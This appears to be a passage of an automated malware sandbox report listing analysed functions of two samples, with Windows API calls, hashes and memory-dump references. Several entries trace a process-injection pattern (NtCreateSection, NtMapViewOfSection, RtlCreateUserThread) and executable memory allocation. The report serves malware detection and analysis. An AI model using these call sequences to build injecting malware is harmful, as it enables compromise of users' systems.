Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 006A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D

Strings

kernel32.dll, xrefs: 006A008F, 006A0095
cess, xrefs: 006A018D

Memory Dump Source

Source File: 00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6a0000_ewggbbh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

Function 0085A178 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085A1A0
Module32First.KERNEL32(00000000,00000224), ref: 0085A1C0

Memory Dump Source

Source File: 00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp, Offset: 00848000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_848000_ewggbbh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d7db7cba0e0e9fd94e8d1be7a8c7d3e837a009f98a92c0d06719d216b6285e31
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 09F06231140B14AFD7243AF9A8CDA6A76EDFF49726F100628EA47D10C0DB70EC498662

Function 006A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E

Memory Dump Source

Source File: 00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6a0000_ewggbbh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 00859E37 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00859E88

Memory Dump Source

Source File: 00000003.00000002.1937968230.0000000000848000.00000040.00000020.00020000.00000000.sdmp, Offset: 00848000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_848000_ewggbbh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7a1ac65716f9822ca2506d24e7db3ff771d2fb5cc1527c274aff49799953e4c1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 36112B79A00208EFDB01DF98C985E99BBF5EF08751F058094F9889B362D371EA50DB81

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Analysis Process: 329C.exePID: 7284, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	25.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	576
Total number of Limit Nodes:	21

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00403899 Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038B8
SetErrorMode.KERNELBASE(00008001), ref: 004038C3
OleInitialize.OLE32(00000000), ref: 004038CA

Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038F2

Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C

GetCommandLineW.KERNEL32(007E95E0,NSIS Error), ref: 00403907
GetModuleHandleW.KERNEL32(00000000,008420A0,00000000), ref: 0040391A
CharNextW.USER32(00000000,008420A0,00000020), ref: 00403941
GetTempPathW.KERNEL32(00002004,008560C8,00000000,00000020), ref: 00403A16
GetWindowsDirectoryW.KERNEL32(008560C8,00001FFF), ref: 00403A2B
lstrcatW.KERNEL32(008560C8,\Temp), ref: 00403A37
DeleteFileW.KERNELBASE(008520C0), ref: 00403A4E
OleUninitialize.OLE32(?), ref: 00403AE7
ExitProcess.KERNEL32 ref: 00403B07
lstrcatW.KERNEL32(008560C8,~nsu.tmp), ref: 00403B13
lstrcmpiW.KERNEL32(008560C8,0084E0B8,008560C8,~nsu.tmp), ref: 00403B1F
CreateDirectoryW.KERNEL32(008560C8,00000000), ref: 00403B2B
SetCurrentDirectoryW.KERNEL32(008560C8), ref: 00403B32
DeleteFileW.KERNEL32(007B1A20,007B1A20,?,007F6008,00409204,007F2000,?), ref: 00403B83
CopyFileW.KERNEL32(0085E0D8,007B1A20,00000001), ref: 00403B97
CloseHandle.KERNEL32(00000000,007B1A20,007B1A20,?,007B1A20,00000000), ref: 00403BC4
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C1A
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C56

Strings

SeShutdownPrivilege, xrefs: 00403C2C
_?=, xrefs: 00403A7A
~nsu.tmp, xrefs: 00403B0D
NSIS Error, xrefs: 004038F8
NCRC, xrefs: 00403992
Error launching installer, xrefs: 00403A93
/D=, xrefs: 004039BC
\Temp, xrefs: 00403A31

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
Instruction ID: 930d0106ac8f21ffe7c218431e73a7c1b7ebb2f3f08f251653cedcfd3481038f
Opcode Fuzzy Hash: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
Instruction Fuzzy Hash: 67A1E6B1540301AAD720BF619D0AE2B3EACEF50745F15483FF582B61D2DBBD89448B6E

Function 00406312 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
GetProcAddress.KERNEL32(00000000), ref: 0040633D

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007A8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.00000000007DF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_329C.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 74a8a5aaaf3dd8a694d56da61a16f6303afc7614e5bdd8def9870afc0854d2e9
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: BCD0123120011597D6001B65AE0895F776CEFA5611707803EF942F3131FB34D515A6EC

Function 004062EB Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007DA700,007D5AF8,004067E4,007D5AF8), ref: 004062F6
FindClose.KERNEL32(00000000), ref: 00406302

Memory Dump Source

Source File: 00000007.00000002.2197189874.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2197171055.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2197240281.0000000000433000.00000004.00000001.01000000.00000006.sdmpDownload File
